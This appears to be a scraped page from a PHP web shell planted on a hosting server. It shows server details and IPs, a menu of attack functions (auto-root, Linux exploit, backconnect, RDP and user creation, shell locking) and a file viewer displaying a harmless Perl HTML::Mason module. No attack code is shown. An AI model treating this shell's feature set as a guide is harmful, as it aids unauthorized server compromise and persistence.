Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
HTML /
Mason /
Resolver /
[ HOME SHELL ]
Name
Size
Permission
Action
File.pm
3.64
KB
-rw-r--r--
Null.pm
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Null.pm
# Copyright (c) 1998-2005 by Jonathan Swartz. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the same terms as Perl itself. package HTML::Mason::Resolver::Null; $HTML::Mason::Resolver::Null::VERSION = '1.59'; use strict; use warnings; use HTML::Mason::Resolver; use base qw(HTML::Mason::Resolver); sub get_info { return; } sub get_source { return; } sub comp_class { return 'HTML::Mason::Component'; } sub glob_path { return; } 1; __END__ =head1 NAME HTML::Mason::Resolver::Null - a do-nothing resolver =head1 SYNOPSIS my $resolver = HTML::Mason::Resolver::Null->new; =head1 DESCRIPTION This HTML::Mason::Resolver subclass is useful if you want to create components via the C<< HTML::Mason::Interp->make_component >> method and you never plan to interact with the filesystem. Basically, it provides all of the necessary resolver methods but none of them do anything. This means that if you use this method things like C<< $interp->exec >> will simply not work at all. However, if you just want to make a component with an interpreter and execute that component it can be useful. For example: my $interp = HTML::Mason::Interp->new( resolver_class => 'HTML::Mason::Resolver::Null', data_dir => '/tmp' ); my $comp = $interp->make_component( comp_source => <<'EOF' ); % my $var = 'World'; Hello, <% $var %>! EOF my $buffer; my $request = $interp->make_request( out_method => \$buffer, comp => $comp ); $request->exec; print $buffer; =cut
Close